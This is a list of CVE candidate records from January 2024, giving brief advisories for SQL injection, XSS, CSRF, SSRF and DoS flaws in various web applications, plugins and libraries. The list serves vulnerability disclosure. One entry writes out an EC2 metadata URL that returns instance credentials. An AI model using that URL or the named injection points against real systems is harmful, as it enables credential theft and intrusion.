CVE    2024    463    Candidate    A vulnerability was found in code-projects Online Faculty Clearance 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /production/admin_view_info.php of the component HTTP POST Request Handler. The manipulation of the argument haydi leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250568.    MISC:https://github.com/BxYQ/vul/blob/main/3ONLINE_FACULTY_CLEARANCE_SYSTEM%20has%20SQL3.pdf   |   URL:https://github.com/BxYQ/vul/blob/main/3ONLINE_FACULTY_CLEARANCE_SYSTEM%20has%20SQL3.pdf   |   MISC:https://vuldb.com/?ctiid.250568   |   URL:https://vuldb.com/?ctiid.250568   |   MISC:https://vuldb.com/?id.250568   |   URL:https://vuldb.com/?id.250568    Assigned (20240112)
CVE    2024    462    Candidate    A vulnerability was found in code-projects Online Faculty Clearance 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /production/designee_view_status.php of the component HTTP POST Request Handler. The manipulation of the argument haydi leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250567.    MISC:https://github.com/BxYQ/vul/blob/main/3ONLINE_FACULTY_CLEARANCE_SYSTEM%20has%20SQL2.pdf   |   URL:https://github.com/BxYQ/vul/blob/main/3ONLINE_FACULTY_CLEARANCE_SYSTEM%20has%20SQL2.pdf   |   MISC:https://vuldb.com/?ctiid.250567   |   URL:https://vuldb.com/?ctiid.250567   |   MISC:https://vuldb.com/?id.250567   |   URL:https://vuldb.com/?id.250567    Assigned (20240112)
CVE    2024    461    Candidate    A vulnerability was found in code-projects Online Faculty Clearance 1.0. It has been classified as critical. Affected is an unknown function of the file deactivate.php of the component HTTP POST Request Handler. The manipulation of the argument haydi leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250566 is the identifier assigned to this vulnerability.    MISC:https://github.com/BxYQ/vul/blob/main/3ONLINE_FACULTY_CLEARANCE_SYSTEM%20has%20SQL1.pdf   |   URL:https://github.com/BxYQ/vul/blob/main/3ONLINE_FACULTY_CLEARANCE_SYSTEM%20has%20SQL1.pdf   |   MISC:https://vuldb.com/?ctiid.250566   |   URL:https://vuldb.com/?ctiid.250566   |   MISC:https://vuldb.com/?id.250566   |   URL:https://vuldb.com/?id.250566    Assigned (20240112)
CVE    2024    460    Candidate    A vulnerability was found in code-projects Faculty Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/pages/student-print.php. The manipulation leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250565 was assigned to this vulnerability.    MISC:https://github.com/BxYQ/vul/blob/main/2Faculty%20Management%20System-SQL.pdf   |   URL:https://github.com/BxYQ/vul/blob/main/2Faculty%20Management%20System-SQL.pdf   |   MISC:https://vuldb.com/?ctiid.250565   |   URL:https://vuldb.com/?ctiid.250565   |   MISC:https://vuldb.com/?id.250565   |   URL:https://vuldb.com/?id.250565    Assigned (20240112)
CVE    2024    459    Candidate    A vulnerability has been found in Blood Bank & Donor Management 5.6 and classified as critical. This vulnerability affects unknown code of the file /admin/request-received-bydonar.php. The manipulation leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250564.    MISC:https://drive.google.com/file/d/1nSgSw1cTXZWeYTjt4rliMIDHyQcGK-8z/view?usp=sharing   |   URL:https://drive.google.com/file/d/1nSgSw1cTXZWeYTjt4rliMIDHyQcGK-8z/view?usp=sharing   |   MISC:https://vuldb.com/?ctiid.250564   |   URL:https://vuldb.com/?ctiid.250564   |   MISC:https://vuldb.com/?id.250564   |   URL:https://vuldb.com/?id.250564    Assigned (20240112)
CVE    2024    456    Candidate    An authorization vulnerability exists in GitLab versions 14.0 prior to 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1. An unauthorized attacker is able to assign arbitrary users to MRs that they created within the project.    MISC:GitLab Issue #430726   |   URL:https://gitlab.com/gitlab-org/gitlab/-/issues/430726   |   MISC:https://about.gitlab.com/releases/2024/01/25/critical-security-release-gitlab-16-8-1-released/   |   URL:https://about.gitlab.com/releases/2024/01/25/critical-security-release-gitlab-16-8-1-released/    Assigned (20240112)
CVE    2024    455    Candidate    The inclusion of the web scraper for AnythingLLM means that any user with the proper authorization level (manager, admin, and when in single user) could put in the URL `http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance` which is a special IP and URL that resolves only when the request comes from within an EC2 instance. This would allow the user to see the connection/secret credentials for their specific instance and be able to manage it regardless of who deployed it. The user would have to have pre-existing knowledge of the hosting infra which the target instance is deployed on, but if sent - would resolve if on EC2 and the proper `iptable` or firewall rule is not configured for their setup.    MISC:https://github.com/mintplex-labs/anything-llm/commit/b2b2c2afe15c48952d57b4d01e7108f9515c5f55   |   URL:https://github.com/mintplex-labs/anything-llm/commit/b2b2c2afe15c48952d57b4d01e7108f9515c5f55   |   MISC:https://huntr.com/bounties/07d83b49-7ebb-40d2-83fc-78381e3c5c9c   |   URL:https://huntr.com/bounties/07d83b49-7ebb-40d2-83fc-78381e3c5c9c    Assigned (20240112)
CVE    2024    454    Candidate    ELAN Match-on-Chip FPR solution has a design fault about potential risk of valid SID leakage and enumeration with spoof sensor. This fault leads to Windows Hello recognition being bypassed by cloning SID to cause broken account identity. Versions lower than 3.0.12011.08009(Legacy)/3.3.12011.08103(ESS) would suffer this risk on DELL Inspiron platform.    MISC:https://www.emc.com.tw/emc/tw/vulnerability-disclosure-policy   |   URL:https://www.emc.com.tw/emc/tw/vulnerability-disclosure-policy    Assigned (20240112)
CVE    2024    450    Candidate    An issue was found in the CPython `zipfile` module affecting versions 3.12.2, 3.11.8, 3.10.13, 3.9.18, and 3.8.18 and prior. The zipfile module is vulnerable to “quoted-overlap” zip-bombs which exploit the zip format to create a zip-bomb with a high compression ratio. The fixed versions of CPython make the zipfile module reject zip archives which overlap entries in the archive.    MISC:https://github.com/python/cpython/commit/30fe5d853b56138dbec62432d370a1f99409fc85   |   URL:https://github.com/python/cpython/commit/30fe5d853b56138dbec62432d370a1f99409fc85   |   MISC:https://github.com/python/cpython/commit/66363b9a7b9fe7c99eba3a185b74c5fdbf842eba   |   URL:https://github.com/python/cpython/commit/66363b9a7b9fe7c99eba3a185b74c5fdbf842eba   |   MISC:https://github.com/python/cpython/commit/a2c59992e9e8d35baba9695eb186ad6c6ff85c51   |   URL:https://github.com/python/cpython/commit/a2c59992e9e8d35baba9695eb186ad6c6ff85c51   |   MISC:https://github.com/python/cpython/commit/a956e510f6336d5ae111ba429a61c3ade30a7549   |   URL:https://github.com/python/cpython/commit/a956e510f6336d5ae111ba429a61c3ade30a7549   |   MISC:https://github.com/python/cpython/commit/d05bac0b74153beb541b88b4fca33bf053990183   |   URL:https://github.com/python/cpython/commit/d05bac0b74153beb541b88b4fca33bf053990183   |   MISC:https://github.com/python/cpython/commit/fa181fcf2156f703347b03a3b1966ce47be8ab3b   |   URL:https://github.com/python/cpython/commit/fa181fcf2156f703347b03a3b1966ce47be8ab3b   |   MISC:https://github.com/python/cpython/issues/109858   |   URL:https://github.com/python/cpython/issues/109858   |   MISC:https://mail.python.org/archives/list/security-announce@python.org/thread/XELNUX2L3IOHBTFU7RQHCY6OUVEWZ2FG/   |   URL:https://mail.python.org/archives/list/security-announce@python.org/thread/XELNUX2L3IOHBTFU7RQHCY6OUVEWZ2FG/   |   MISC:https://www.bamsoftware.com/hacks/zipbomb/   |   URL:https://www.bamsoftware.com/hacks/zipbomb/   |   MLIST:[debian-lts-announce] 20240324 [SECURITY] [DLA 3771-1] python2.7 security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00024.html   |   MLIST:[debian-lts-announce] 20240324 [SECURITY] [DLA 3772-1] python3.7 security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00025.html    Assigned (20240111)
CVE    2024    449    Candidate    The ArtiBot Free Chat Bot for WordPress WebSites plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.1.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.    MISC:https://plugins.trac.wordpress.org/browser/artibot/trunk/artibot.php#L52   |   URL:https://plugins.trac.wordpress.org/browser/artibot/trunk/artibot.php#L52   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/450d0748-93d6-448a-97a2-06fc2f8065b3?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/450d0748-93d6-448a-97a2-06fc2f8065b3?source=cve    Assigned (20240111)
CVE    2024    448    Candidate    The Elementor Addons by Livemesh plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widget URL parameters in all versions up to, and including, 8.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/addons-for-elementor/trunk/templates/addons/services/content.php#L20   |   URL:https://plugins.trac.wordpress.org/browser/addons-for-elementor/trunk/templates/addons/services/content.php#L20   |   MISC:https://plugins.trac.wordpress.org/browser/addons-for-elementor/trunk/templates/addons/team-members/style1.php#L17   |   URL:https://plugins.trac.wordpress.org/browser/addons-for-elementor/trunk/templates/addons/team-members/style1.php#L17   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3026261%40addons-for-elementor%2Ftrunk&old=3022220%40addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3026261%40addons-for-elementor%2Ftrunk&old=3022220%40addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/058d1aa0-2ef6-49a4-b978-43a91c8e55f3?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/058d1aa0-2ef6-49a4-b978-43a91c8e55f3?source=cve    Assigned (20240111)
CVE    2024    447    Candidate    The ArtiBot Free Chat Bot for WordPress WebSites plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the artibot_update function in all versions up to, and including, 1.1.6. This makes it possible for authenticated attackers, with subscriber-level access and above, to update plugin settings.    MISC:https://plugins.trac.wordpress.org/browser/artibot/trunk/artibot.php#L60   |   URL:https://plugins.trac.wordpress.org/browser/artibot/trunk/artibot.php#L60   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/848f36de-c62a-45ee-b259-46dab73e4439?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/848f36de-c62a-45ee-b259-46dab73e4439?source=cve    Assigned (20240111)
CVE    2024    446    Candidate    A maliciously crafted STP, CATPART or MODEL file in ASMKERN228A.dll when parsed through Autodesk AutoCAD can force an Out-of-Bound Write. A malicious actor can leverage this vulnerability to cause a crash, write sensitive data, or execute arbitrary code in the context of the current process.    MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002   |   URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002   |   MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004   |   URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004    Assigned (20240111)
CVE    2024    443    Candidate    A flaw was found in the blkgs destruction path in block/blk-cgroup.c in the Linux kernel, leading to a cgroup blkio memory leakage problem. When a cgroup is being destroyed, cgroup_rstat_flush() is only called at css_release_work_fn(), which is called when the blkcg reference count reaches 0. This circular dependency will prevent blkcg and some blkgs from being freed after they are made offline. This issue may allow an attacker with local access to cause system instability, such as an out of memory error.    MISC:RHBZ#2257968   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2257968   |   MISC:RHSA-2023:7077   |   URL:https://access.redhat.com/errata/RHSA-2023:7077   |   MISC:https://access.redhat.com/security/cve/CVE-2024-0443   |   URL:https://access.redhat.com/security/cve/CVE-2024-0443   |   MISC:https://lore.kernel.org/linux-block/20221215033132.230023-3-longman@redhat.com/   |   URL:https://lore.kernel.org/linux-block/20221215033132.230023-3-longman@redhat.com/    Assigned (20240111)
CVE    2024    442    Candidate    The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via element URL parameters in all versions up to, and including, 1.3.87 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset/3032004/royal-elementor-addons/tags/1.3.88/modules/advanced-slider/widgets/wpr-advanced-slider.php?old=3026824&old_path=royal-elementor-addons%2Ftags%2F1.3.87%2Fmodules%2Fadvanced-slider%2Fwidgets%2Fwpr-advanced-slider.php   |   URL:https://plugins.trac.wordpress.org/changeset/3032004/royal-elementor-addons/tags/1.3.88/modules/advanced-slider/widgets/wpr-advanced-slider.php?old=3026824&old_path=royal-elementor-addons%2Ftags%2F1.3.87%2Fmodules%2Fadvanced-slider%2Fwidgets%2Fwpr-advanced-slider.php   |   MISC:https://plugins.trac.wordpress.org/changeset/3032004/royal-elementor-addons/tags/1.3.88/modules/dual-button/widgets/wpr-dual-button.php?old=3026824&old_path=royal-elementor-addons%2Ftags%2F1.3.87%2Fmodules%2Fdual-button%2Fwidgets%2Fwpr-dual-button.php   |   URL:https://plugins.trac.wordpress.org/changeset/3032004/royal-elementor-addons/tags/1.3.88/modules/dual-button/widgets/wpr-dual-button.php?old=3026824&old_path=royal-elementor-addons%2Ftags%2F1.3.87%2Fmodules%2Fdual-button%2Fwidgets%2Fwpr-dual-button.php   |   MISC:https://plugins.trac.wordpress.org/changeset/3032004/royal-elementor-addons/tags/1.3.88/modules/pricing-table/widgets/pricing-table.php?old=3026824&old_path=royal-elementor-addons%2Ftags%2F1.3.87%2Fmodules%2Fpricing-table%2Fwidgets%2Fpricing-table.php   |   URL:https://plugins.trac.wordpress.org/changeset/3032004/royal-elementor-addons/tags/1.3.88/modules/pricing-table/widgets/pricing-table.php?old=3026824&old_path=royal-elementor-addons%2Ftags%2F1.3.87%2Fmodules%2Fpricing-table%2Fwidgets%2Fpricing-table.php   |   MISC:https://plugins.trac.wordpress.org/changeset?old_path=/royal-elementor-addons/tags/1.3.87&new_path=/royal-elementor-addons/tags/1.3.88&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?old_path=/royal-elementor-addons/tags/1.3.87&new_path=/royal-elementor-addons/tags/1.3.88&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/256b4818-290b-4660-8e83-c18b068a8959?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/256b4818-290b-4660-8e83-c18b068a8959?source=cve    Assigned (20240111)
CVE    2024    440    Candidate    An attacker with permission to submit a link, or who submits a link via POST to be collected, that is using the file:// protocol can then introspect host files and other relatively stored files.    MISC:https://github.com/mintplex-labs/anything-llm/commit/1563a1b20f72846d617a88510970d0426ab880d3   |   URL:https://github.com/mintplex-labs/anything-llm/commit/1563a1b20f72846d617a88510970d0426ab880d3   |   MISC:https://huntr.com/bounties/263fd7eb-f9a9-4578-9655-0e28c609272f   |   URL:https://huntr.com/bounties/263fd7eb-f9a9-4578-9655-0e28c609272f    Assigned (20240111)
CVE    2024    439    Candidate    As a manager, you should not be able to modify a series of settings. In the UI this is indeed hidden as a convenience for the role since most managers would not be savvy enough to modify these settings. They can still use their token to modify those settings, though, through a standard HTTP request. While this is not a critical vulnerability, it does indeed need to be patched to enforce the expected permission level.    MISC:https://github.com/mintplex-labs/anything-llm/commit/7200a06ef07d92eef5f3c4c8be29824aa001d688   |   URL:https://github.com/mintplex-labs/anything-llm/commit/7200a06ef07d92eef5f3c4c8be29824aa001d688   |   MISC:https://huntr.com/bounties/7fc1b78e-7faf-4f40-961d-61e53dac81ce   |   URL:https://huntr.com/bounties/7fc1b78e-7faf-4f40-961d-61e53dac81ce    Assigned (20240111)
CVE    2024    438    Candidate    The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the wrapper link parameter in the Age Gate in all versions up to, and including, 3.10.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/happy-elementor-addons/tags/3.10.1/assets/js/happy-addons.js#L991   |   URL:https://plugins.trac.wordpress.org/browser/happy-elementor-addons/tags/3.10.1/assets/js/happy-addons.js#L991   |   MISC:https://plugins.trac.wordpress.org/browser/happy-elementor-addons/tags/3.10.1/extensions/wrapper-link.php#L50   |   URL:https://plugins.trac.wordpress.org/browser/happy-elementor-addons/tags/3.10.1/extensions/wrapper-link.php#L50   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3028056%40happy-elementor-addons%2Ftrunk&old=3016053%40happy-elementor-addons%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3028056%40happy-elementor-addons%2Ftrunk&old=3016053%40happy-elementor-addons%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/267641fe-7490-4b8f-bb39-9531eefa2c30?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/267641fe-7490-4b8f-bb39-9531eefa2c30?source=cve    Assigned (20240111)
CVE    2024    436    Candidate    Theoretically, it would be possible for an attacker to brute-force the password for an instance in single-user password protection mode via a timing attack given the linear nature of the `!==` used for comparison. The risk is minimized by the additional overhead of the request, which varies in a non-constant nature, making the attack less reliable to execute.    MISC:https://github.com/mintplex-labs/anything-llm/commit/3c859ba3038121b67fb98e87dc52617fa27cbef0   |   URL:https://github.com/mintplex-labs/anything-llm/commit/3c859ba3038121b67fb98e87dc52617fa27cbef0   |   MISC:https://huntr.com/bounties/3e73cb96-c038-46a1-81b7-4d2215b36268   |   URL:https://huntr.com/bounties/3e73cb96-c038-46a1-81b7-4d2215b36268    Assigned (20240111)
CVE    2024    435    Candidate    User can send a chat that contains an XSS opportunity that will then run when the chat is sent and on subsequent page loads. Given the minimum requirement for a user to send a chat is to be given access to a workspace via an admin the risk is low. Additionally, the location in which the XSS renders is only limited to the user who submits the XSS. Ultimately, this attack is limited to the user attacking themselves. There is no anonymous chat submission unless the user does not take the minimum steps required to protect their instance.    MISC:https://github.com/mintplex-labs/anything-llm/commit/a4ace56a401ffc8ce0082d7444159dfd5dc28834   |   URL:https://github.com/mintplex-labs/anything-llm/commit/a4ace56a401ffc8ce0082d7444159dfd5dc28834   |   MISC:https://huntr.com/bounties/53308220-8b2e-492f-b248-0985b7c2db61   |   URL:https://huntr.com/bounties/53308220-8b2e-492f-b248-0985b7c2db61    Assigned (20240111)
CVE    2024    433    Candidate    The Gestpay for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 20221130. This is due to missing or incorrect nonce validation on the 'ajax_unset_default_card' function. This makes it possible for unauthenticated attackers to remove the default status of a card token for a user via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://wordpress.org/plugins/wppdf/   |   URL:https://wordpress.org/plugins/wppdf/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/44b62b99-99eb-424b-a04a-9bbacf5fbbaa?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/44b62b99-99eb-424b-a04a-9bbacf5fbbaa?source=cve    Assigned (20240111)
CVE    2024    432    Candidate    The Gestpay for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 20221130. This is due to missing or incorrect nonce validation on the 'ajax_delete_card' function. This makes it possible for unauthenticated attackers to delete the default card token for a user via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://wordpress.org/plugins/wppdf/   |   URL:https://wordpress.org/plugins/wppdf/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/7561a71a-c3f0-45f1-8230-2c17cbeff916?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/7561a71a-c3f0-45f1-8230-2c17cbeff916?source=cve    Assigned (20240111)
CVE    2024    431    Candidate    The Gestpay for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 20221130. This is due to missing or incorrect nonce validation on the 'ajax_set_default_card' function. This makes it possible for unauthenticated attackers to set the default card token for a user via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/browser/gestpay-for-woocommerce/trunk/inc/class-gestpay-cards.php#L117   |   URL:https://plugins.trac.wordpress.org/browser/gestpay-for-woocommerce/trunk/inc/class-gestpay-cards.php#L117   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/7d3a6650-5be0-4162-93eb-369538a2ebc5?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/7d3a6650-5be0-4162-93eb-369538a2ebc5?source=cve    Assigned (20240111)
CVE    2024    430    Candidate    IObit Malware Fighter v11.0.0.1274 is vulnerable to a Denial of Service vulnerability by triggering the 0x8001E00C IOCTL code of the ImfHpRegFilter.sys driver.    MISC:https://fluidattacks.com/advisories/davis/   |   URL:https://fluidattacks.com/advisories/davis/   |   MISC:https://www.iobit.com/en/malware-fighter.php   |   URL:https://www.iobit.com/en/malware-fighter.php    Assigned (20240111)
CVE    2024    429    Candidate    A denial of service vulnerability has been found in Hex Workshop affecting version 6.7. An attacker could send command line file arguments and control the Structured Exception Handler (SEH) records, resulting in a service shutdown.    MISC:https://https://www.incibe.es/en/incibe-cert/notices/aviso/buffer-overflow-vulnerability-hex-workshop   |   URL:https://https://www.incibe.es/en/incibe-cert/notices/aviso/buffer-overflow-vulnerability-hex-workshop    Assigned (20240111)
CVE    2024    428    Candidate    The Index Now plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6.3. This is due to missing or incorrect nonce validation on the 'reset_form' function. This makes it possible for unauthenticated attackers to delete arbitrary site options via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset/3020958/mihdan-index-now/tags/2.6.4/src/Views/WPOSA.php   |   URL:https://plugins.trac.wordpress.org/changeset/3020958/mihdan-index-now/tags/2.6.4/src/Views/WPOSA.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/c7641d52-e930-4143-9180-2903d018da91?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/c7641d52-e930-4143-9180-2903d018da91?source=cve    Assigned (20240111)
CVE    2024    426    Candidate    A vulnerability, which was classified as critical, has been found in ForU CMS up to 2020-06-23. This issue affects some unknown processing of the file admin/cms_template.php. The manipulation of the argument t_name/t_path leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250445 was assigned to this vulnerability.    MISC:https://github.com/mi2acle/forucmsvuln/blob/master/sqli.md   |   URL:https://github.com/mi2acle/forucmsvuln/blob/master/sqli.md   |   MISC:https://vuldb.com/?ctiid.250445   |   URL:https://vuldb.com/?ctiid.250445   |   MISC:https://vuldb.com/?id.250445   |   URL:https://vuldb.com/?id.250445    Assigned (20240111)
CVE    2024    425    Candidate    A vulnerability classified as critical was found in ForU CMS up to 2020-06-23. This vulnerability affects unknown code of the file /admin/index.php?act=reset_admin_psw. The manipulation leads to weak password recovery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250444.    MISC:https://github.com/mi2acle/forucmsvuln/blob/master/passwordreset.md   |   URL:https://github.com/mi2acle/forucmsvuln/blob/master/passwordreset.md   |   MISC:https://vuldb.com/?ctiid.250444   |   URL:https://vuldb.com/?ctiid.250444   |   MISC:https://vuldb.com/?id.250444   |   URL:https://vuldb.com/?id.250444    Assigned (20240111)
CVE    2024    424    Candidate    A vulnerability classified as problematic has been found in CodeAstro Simple Banking System 1.0. This affects an unknown part of the file createuser.php of the component Create a User Page. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250443.    MISC:https://drive.google.com/file/d/1jr5YRrESDjcNmhpQRK5yHvvxNlYJp2oK/view?usp=sharing   |   URL:https://drive.google.com/file/d/1jr5YRrESDjcNmhpQRK5yHvvxNlYJp2oK/view?usp=sharing   |   MISC:https://vuldb.com/?ctiid.250443   |   URL:https://vuldb.com/?ctiid.250443   |   MISC:https://vuldb.com/?id.250443   |   URL:https://vuldb.com/?id.250443    Assigned (20240111)
CVE    2024    423    Candidate    A vulnerability was found in CodeAstro Online Food Ordering System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file dishes.php. The manipulation of the argument res_id leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250442 is the identifier assigned to this vulnerability.    MISC:https://drive.google.com/file/d/1SaHrOPMV6yrBaS5pA7MOX8nsiVGxvlOa/view?usp=sharing   |   URL:https://drive.google.com/file/d/1SaHrOPMV6yrBaS5pA7MOX8nsiVGxvlOa/view?usp=sharing   |   MISC:https://vuldb.com/?ctiid.250442   |   URL:https://vuldb.com/?ctiid.250442   |   MISC:https://vuldb.com/?id.250442   |   URL:https://vuldb.com/?id.250442    Assigned (20240111)
CVE    2024    422    Candidate    A vulnerability was found in CodeAstro POS and Inventory Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /new_item of the component New Item Creation Page. The manipulation of the argument new_item leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250441 was assigned to this vulnerability.    MISC:https://drive.google.com/file/d/1_CoeXcCC8fXzKJO-Xvjuq1qYtf8QKHaM/view?usp=sharing   |   URL:https://drive.google.com/file/d/1_CoeXcCC8fXzKJO-Xvjuq1qYtf8QKHaM/view?usp=sharing   |   MISC:https://vuldb.com/?ctiid.250441   |   URL:https://vuldb.com/?ctiid.250441   |   MISC:https://vuldb.com/?id.250441   |   URL:https://vuldb.com/?id.250441    Assigned (20240111)
CVE    2024    421    Candidate    The MapPress Maps for WordPress plugin before 2.88.16 does not ensure that a post to be retrieved via an AJAX action is a public map, allowing unauthenticated users to read arbitrary private and draft posts.    MISC:https://wpscan.com/vulnerability/587acc47-1966-4baf-a380-6aa479a97c82/   |   URL:https://wpscan.com/vulnerability/587acc47-1966-4baf-a380-6aa479a97c82/    Assigned (20240111)
CVE    2024    420    Candidate    The MapPress Maps for WordPress plugin before 2.88.15 does not sanitize and escape the map title when outputting it back in the admin dashboard, allowing Contributors and above roles to perform Stored Cross-Site Scripting attacks.    MISC:https://wpscan.com/vulnerability/b6187ef8-70f4-4911-abd7-42bf6b7e54b7/   |   URL:https://wpscan.com/vulnerability/b6187ef8-70f4-4911-abd7-42bf6b7e54b7/    Assigned (20240111)
CVE    2024    419    Candidate    A vulnerability was found in Jasper httpdx up to 1.5.4 and classified as problematic. This issue affects some unknown processing of the component HTTP POST Request Handler. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250439.    MISC:https://cxsecurity.com/issue/WLB-2024010027   |   URL:https://cxsecurity.com/issue/WLB-2024010027   |   MISC:https://vuldb.com/?ctiid.250439   |   URL:https://vuldb.com/?ctiid.250439   |   MISC:https://vuldb.com/?id.250439   |   URL:https://vuldb.com/?id.250439   |   MISC:https://www.youtube.com/watch?v=6dAWGH0-6TY   |   URL:https://www.youtube.com/watch?v=6dAWGH0-6TY    Assigned (20240111)
CVE    2024    418    Candidate    A vulnerability has been found in iSharer and upRedSun File Sharing Wizard up to 1.5.0 and classified as problematic. This vulnerability affects unknown code of the component GET Request Handler. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250438 is the identifier assigned to this vulnerability.    MISC:https://cxsecurity.com/issue/WLB-2024010023   |   URL:https://cxsecurity.com/issue/WLB-2024010023   |   MISC:https://vuldb.com/?ctiid.250438   |   URL:https://vuldb.com/?ctiid.250438   |   MISC:https://vuldb.com/?id.250438   |   URL:https://vuldb.com/?id.250438   |   MISC:https://www.youtube.com/watch?v=WK7xK9KHiMU   |   URL:https://www.youtube.com/watch?v=WK7xK9KHiMU    Assigned (20240111)
CVE    2024    417    Candidate    A vulnerability, which was classified as critical, was found in DeShang DSShop up to 2.1.5. This affects an unknown part of the file application/home/controller/MemberAuth.php. The manipulation of the argument member_info leads to path traversal: '../filedir'. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250437 was assigned to this vulnerability.    MISC:https://note.zhaoj.in/share/ZpRTCLblKd7N   |   URL:https://note.zhaoj.in/share/ZpRTCLblKd7N   |   MISC:https://vuldb.com/?ctiid.250437   |   URL:https://vuldb.com/?ctiid.250437   |   MISC:https://vuldb.com/?id.250437   |   URL:https://vuldb.com/?id.250437    Assigned (20240111)
